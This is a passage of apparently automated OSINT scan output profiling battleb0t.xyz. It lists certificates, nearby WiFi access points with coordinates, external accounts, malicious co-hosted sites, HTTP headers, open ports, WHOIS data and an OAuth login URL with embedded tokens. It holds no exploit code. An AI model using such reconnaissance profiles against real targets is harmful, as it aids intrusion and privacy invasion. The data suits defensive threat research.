type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002768]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.google.com/support/translate+(en==Hn?:#googtrans/en/+Hn);var"\n Pattern match: "https://www.google.com/tools/feedback},Tw=function(a){return"\n Pattern match: "https://github.com/madler/zlib/blob/master/zlib.h"\n Pattern match: "https://www.google.com/images/cleardot.gif"\n Pattern match: "https://==Pn?V.Gh:null};this.Z={qb:Un,xd:null};a&&"\n Pattern match: "V.Pb/\ufffd\u0331"\n Pattern match: "http://fontawesome.io"\n Pattern match: "http://fontawesome.io/license"\n Pattern match: "http://jquery.com/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://sizzlejs.com/"\n Pattern match: "https://www&google.com/images/zippy_minus_sm.gif"\n Pattern match: "http://www.w3.org/TR/selectors/#attribute-selectors"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#attribute-selectors"\n Pattern match: "https://developer.mozilla.org/en/Security/CSP"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#escaped-characters"\n Pattern match: "http://bugs.jquery.com/ticket/12282#comment:15"\n Pattern match: "http://blindsignals.com/index.php/2009/07/jquery-delay/"\n Pattern match: "http://bugs.jquery.com/ticket/12359"\n Pattern match: "http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291"\n Pattern match: "http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/"\n Pattern match: "http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_AVAILABLE)"\n Pattern match: "http://javascript.nwbox.com/IEContentLoaded/"\n Pattern match: "http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx"\n Pattern match: "http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context"\n Pattern match: "http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html"\n Pattern match: "http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked"\n Pattern match: "http://www.w3.org/TR/css3-syntax/#characters"\n Pattern match: "http://www.w3.org/TR/selectors/#empty-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#lang-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#pseudo-classes"\n Pattern match: "https://github.com/jquery/jquery/pull/764"\n Pattern match: "http://json.org/json2.js"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=491668"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier"\n Pattern match: "https://developer.mozilla.org/en-US/docs/CSS/display"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=649285"\n Pattern match: "http://dev.w3.org/csswg/cssom/#resolved-values"\n Pattern match: "http://jsperf.com/getall-vs-sizzle/2"\n Pattern match: "https://bugs.webkit.org/show_bug.cgi?id=29084"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#whitespace"\n Pattern match: "https://bafybeia3mpocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a.ipfs.dweb.link/"\n Pattern match: "https://translate.google.com/translate_a/element.js?cb=gtElInit&hl=en-US&client=wt"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/exm=corsproxy/ed=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=navigationui"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=corsproxy"\n Pattern match: "https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog\\]]],null,null,null,null,null,null,-3600,null,null,null,null,[],1,nu |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Open-source software hosting facilities | cdn-185-199-111-153.github.com |
| 2023-05-12 02:48:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:a2:98:ee:7c:0f:82:53:85:c9:ed:86:47:94:a7:aa:74:64
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:54:05 2023 GMT
Not After : Apr 27 17:54:04 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d2:cd:d6:7e:84:63:03:a9:a4:54:af:d4:a6:67:
cf:f7:3e:0c:ab:80:9d:a8:22:bf:ee:64:c0:1e:dd:
e1:9d:29:3b:aa:bb:b6:1a:dd:d0:c3:5d:15:61:c8:
eb:00:a8:62:02:a5:c4:0c:4d:3a:56:20:d3:19:1c:
24:d9:21:05:da:7b:34:cd:5b:3f:9f:3f:ff:56:cb:
60:a2:2a:6a:1f:63:a5:f7:6c:bc:e6:cd:4b:7c:cb:
c6:0b:ba:27:31:61:c2:7b:47:19:7b:f1:52:41:68:
44:d8:1a:a5:11:c2:d5:cd:2d:49:92:07:b0:5c:c3:
2d:0c:54:f4:e5:8e:0a:3e:0a:05:99:5f:e9:65:18:
80:c0:5e:b2:87:08:2d:60:b2:01:35:c9:41:a1:4e:
56:80:bc:0b:2d:89:62:c9:e1:19:f4:a9:de:a5:de:
27:dd:96:99:29:26:9e:36:03:45:4b:bf:4a:de:ef:
5f:47:82:05:6f:ed:a1:4f:34:05:75:05:59:d0:32:
a2:22:c4:9d:5a:65:cd:6b:45:d7:7f:45:90:2e:36:
4c:3d:0a:62:83:36:a6:3c:d9:df:00:c7:cb:10:68:
6e:0c:d8:9c:a6:a5:e6:32:7b:12:0d:1c:1f:90:20:
a5:a7:c9:da:be:0f:96:fe:30:6b:29:55:ac:4a:68:
7b:12:dd:43:df:cf:f5:49:87:8c:9b:38:92:62:52:
c6:f8:97:d4:43:d6:ed:cb:66:79:5b:c9:60:9e:db:
33:f0:59:fb:fd:35:62:83:55:b5:65:04:20:55:ee:
82:6d:de:85:c1:18:ed:8c:10:29:47:46:ee:2a:eb:
57:cd:b1:5e:14:a7:37:00:58:3a:35:9d:fe:99:73:
d6:cd:b6:67:17:f6:27:29:ea:32:96:67:c8:fa:43:
a3:c2:cc:ca:bb:cb:87:e5:76:db:8a:de:bc:58:c7:
6c:12:6a:a6:93:1b:0a:ce:07:98:f7:7c:0d:1d:5e:
2a:ac:2b:fb:17:f1:cb:e0:a5:02:67:2b:3d:67:81:
d8:de:3e:15:6a:f0:a0:0d:64:2d:0e:9b:55:1e:1b:
69:69:5a:ae:14:c6:1c:ce:8e:c5:fd:2c:25:74:92:
c1:35:de:00:ee:bc:fa:5d:88:f2:17:fe:70:37:3b:
3b:f5:14:3a:4b:f4:50:a9:91:31:99:48:3f:9e:c6:
ad:0b:a6:89:2d:77:db:fb:64:f8:31:9a:82:d1:cd:
f7:6a:51:a4:b7:d3:da:23:3d:ff:2a:45:de:3b:b5:
32:78:69:cd:54:60:d3:2a:39:e1:61:db:5a:d2:78:
94:77:f6:b5:99:c5:b9:3c:95:4b:75:db:f8:2b:d4:
ad:de:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:62:E5:21:FA:E8:50:FB:CE:5D:D2:7E:68:EA:9B:E0:B1:2E:4D:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
15:ef:a6:fd:ef:21:53:78:53:f6:e6:7d:e0:a9:be:9a:f4:2a:
f3:6b:f8:45:b0:1e:92:39:ea:7f:20:4e:9d:7e:15:34:36:61:
5c:46:2f:03:80:59:84:da:ef:66:78:da:e7:b0:f0:dc:e6:6a:
c6:b2:06:d7:47:db:11:48:d1:1f:c9:fd:2b:78:20:9d:86:11:
3b:e4:51:10:b8:54:d7:6e:6f:db:ce:56:14:fa:f5:79:05:a8:
02:0b:cb:0a:18:31:3a:e9:dd:4b:c7:d7:53:e4:2f:bc:37:98:
11:c7:a5:55:7f:64:7e:ee:5a:1d:86:0e:38:0c:bd:8e:2a:bd:
3e:16:9b:63:5f:9f:06:9d:58:f3:3d:71:94:e6:c1:49:68:5e:
41:22:f6:d4:2e:f7:b9:62:b8:3b:2f:c1:c6:66:8c:a7:82:e0:
40:ef:66:13:cd:53:80:bc:ca:bc:49:c0:67:81:c8:1d:d8:f5:
37:5a:da:e3:56:36:cd:fd:cb:00:ce:97:33:4d:b7:29:cd:90:
4e:43:37:62:d7:92:39:fa:36:a2:59:0a:4f:35:fa:8e:5a:01:
29:c9:4e:6f:ae:1d:31:a2:f5:71:7f:a1:e1:58:17:ea:74:b0:
26:53:2b:a4:97:e8:9a:a1:10:a9:a5:e1:7b:21:18:15:30:ae:
dd:15:ba:8d
| battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-25 03:05:10 | battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | UTAAPC (Net ID: 00:02:6F:35:38:63) | 37.7642, -122.3993 |
| 2023-05-12 02:44:27 | Web Technology | No | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Express | nwapi.battleb0t.xyz |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Bookcrossing (Category: hobby)
https://www.bookcrossing.com/mybookshelf/Altpapier | Altpapier |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | omniblock (Net ID: 00:09:5B:E9:6B:D6) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.254): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c55c7e88fa82340-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WLAN_HS (Net ID: 00:01:E3:41:FA:3E) | 50.1188, 8.6843 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | clownleo (Net ID: 00:02:CF:AF:25:7D) | 40.2024, 29.0398 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551552560 (Net ID: 00:01:E3:55:25:60) | 52.3759, 4.8975 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | KEIL (Net ID: 00:01:38:A5:B3:D3) | 37.7642, -122.3993 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES_RT-205 (Net ID: 00:1A:2A:02:E8:38) | 40.2024, 29.0398 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:41 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | United States, South Carolina, North Charleston | 104.196.30.220 |
| 2023-05-12 02:49:19 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
0a:22:b1:e9:af:d4:a9:74:88:84:74:c6:0c:06:4e:88:44:eb:
3d:8b:ff:0f:67:9b:d9:59:64:93:86:9d:3a:67:d2:a0:3e:52:
6d:1c:e7:15:10:f3:f5:51:a1:19:bc:c1:17:81:af:6e:00:02:
2c:2b:94:b9:a1:29:49:0c:d6:a8:59:00:4b:47:60:f7:bf:4d:
a5:8e:dc:6c:e7:62:2f:6e:45:28:27:5d:0b:af:59:e7:df:13:
7b:cf:b2:a2:da:32:8d:b4:3a:0a:9a:bf:a9:4a:e7:ca:7c:b6:
03:94:66:c9:f3:4e:8b:df:cb:62:a9:c2:05:d7:41:e7:96:0d:
2f:fd:52:d1:77:82:07:ba:c9:49:53:9d:54:ee:70:d1:90:b1:
a3:cc:e7:9c:0c:45:e3:02:85:7d:b0:fb:ec:d0:7e:53:65:3b:
df:c8:91:a1:21:7f:e2:6c:76:54:71:ce:4e:bd:b9:b8:30:a1:
c2:bc:22:2f:5c:87:b2:76:87:ed:5e:2b:71:c5:82:1c:b7:14:
13:1b:f2:3d:0c:ee:c2:59:8f:7f:d2:9f:b0:78:9f:80:1f:ba:
8b:65:58:fc:3c:40:e8:02:39:06:f7:24:58:38:34:e0:0d:b2:
2e:8a:82:16:b9:ac:3d:73:4d:68:a6:f4:81:4c:48:22:6d:44:
3e:f3:16:30
| battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:79:27:12) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Wikidot (Category: social)
http://www.wikidot.com/user:info/login | login |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.136 | 34.148.97.127 |
| 2023-05-12 02:44:14 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | pics.battleb0t.xyz |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [010916hao.github.io]
https://www.openphish.com/feed.txt | 010916hao.github.io |
| 2023-05-12 03:32:18 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 4 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-108-154.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-108-154.github.com |
| 2023-05-12 02:44:18 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 185.199.110.153:443 | 185.199.110.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Chamsko (Category: images)
https://www.chamsko.pl/profil/login | login |
| 2023-05-12 03:00:55 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00indahouse.github.io | 185.199.111.153 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | jQuery | pics.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:BB:17:A7) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:10:12 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [172.67.128.0/20]
http://www.voipbl.org/update | 172.67.128.0/20 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:F9:8E:4E) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5a3c76a8562af2-ORD
| 188.114.97.1 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Monkeytown (Net ID: 00:02:2D:29:53:67) | 37.7642, -122.3993 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | San Francisco (South Beach), California, 94107, United States, North America |
| 2023-05-12 03:36:20 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.128:443 | 188.114.97.0/24 |
| 2023-05-12 02:54:22 | HTTP Status Code | No | Web Spider | 0 | 1 | 2 | 0 | None | 403 | www.ayhu.xyz |
| 2023-05-12 02:54:22 | Linked URL - External | No | Web Spider | 2 | 0 | 4 | 0 | None | https://github.com/login/oauth/authorize?client_id=42db428b279076117521&redirect_uri=https://qolhub.cloudflareaccess.com/cdn-cgi/access/callback&response_type=code&scope=user:email,read:org&state=9995ee075e82e86ee47e714d846227dc35b4772134e51bd1627e17e1594cf0fa.JTdCJTIyaWF0JTIyJTNBMTY4Mzg2MDA2MiUyQyUyMmF1dGhEb21haW4lMjIlM0ElMjJxb2xodWIuY2xvdWRmbGFyZWFjY2Vzcy5jb20lMjIlMkMlMjJob3N0bmFtZSUyMiUzQSUyMnBhbmVsLmJhdHRsZWIwdC54eXolMjIlMkMlMjJyZWRpcmVjdFVSTCUyMiUzQSUyMiUyRiUyMiUyQyUyMmF1ZCUyMiUzQSUyMjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMlMjIlMkMlMjJpc1NhbWVTaXRlTm9uZUNvbXBhdGlibGUlMjIlM0F0cnVlJTJDJTIyaXNJRFBUZXN0JTIyJTNBZmFsc2UlMkMlMjJpc1JlZnJlc2glMjIlM0FmYWxzZSUyQyUyMm5vbmNlJTIyJTNBJTIybnJqNDNmeHBOVUJsSTJVdGQlMjIlMkMlMjJpZHBJZCUyMiUzQSUyMjc2MDcwNmM0LTZhMGItNDFlZC05ZjJhLTI5NGFkZjQ1NjBkYSUyMiUyQyUyMnNlcnZpY2VfdG9rZW5faWQlMjIlM0ElMjIlMjIlMkMlMjJzZXJ2aWNlX3Rva2VuX3N0YXR1cyUyMiUzQWZhbHNlJTJDJTIyYXV0aF9zdGF0dXMlMjIlM0ElMjJOT05FJTIyJTJDJTIyaXNfd2FycCUyMiUzQWZhbHNlJTJDJTIyaXNfZ2F0ZXdheSUyMiUzQWZhbHNlJTJDJTIybXRsc19hdXRoJTIyJTNBJTdCJTIyY2VydF9pc3N1ZXJfc2tpJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9wcmVzZW50ZWQlMjIlM0FmYWxzZSUyQyUyMmNlcnRfc2VyaWFsJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9pc3N1ZXJfZG4lMjIlM0ElMjIlMjIlMkMlMjJhdXRoX3N0YXR1cyUyMiUzQSUyMk5PTkUlMjIlN0QlMkMlMjJhcHBTZXNzaW9uSGFzaCUyMiUzQSUyMjRmN2M5OTlmNGM0OTk1OTE5NTUyZGRkYWUzMWYwMzEwZjI2OTc4ZWZlZGE1M2FmMmQ4MThmNWVlZTRlY2EyOTMlMjIlN0Q%3D | https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=%2F&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.eyJzZXJ2aWNlX3Rva2VuX3N0YXR1cyI6ZmFsc2UsImlhdCI6MTY4Mzg2MDA2Miwic2VydmljZV90b2tlbl9pZCI6IiIsImF1ZCI6IjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMiLCJob3N0bmFtZSI6InBhbmVsLmJhdHRsZWIwdC54eXoiLCJhcHBfc2Vzc2lvbl9oYXNoIjoiNGY3Yzk5OWY0YzQ5OTU5MTk1NTJkZGRhZTMxZjAzMTBmMjY5NzhlZmVkYTUzYWYyZDgxOGY1ZWVlNGVjYTI5MyIsIm5iZiI6MTY4Mzg2MDA2MiwiaXNfd2FycCI6ZmFsc2UsImlzX2dhdGV3YXkiOmZhbHNlLCJ0eXBlIjoibWV0YSIsInJlZGlyZWN0X3VybCI6IlwvIiwibXRsc19hdXRoIjp7ImNlcnRfaXNzdWVyX3NraSI6IiIsImNlcnRfcHJlc2VudGVkIjpmYWxzZSwiY2VydF9zZXJpYWwiOiIiLCJjZXJ0X2lzc3Vlcl9kbiI6IiIsImF1dGhfc3RhdHVzIjoiTk9ORSJ9LCJhdXRoX3N0YXR1cyI6Ik5PTkUifQ.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@web.com | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
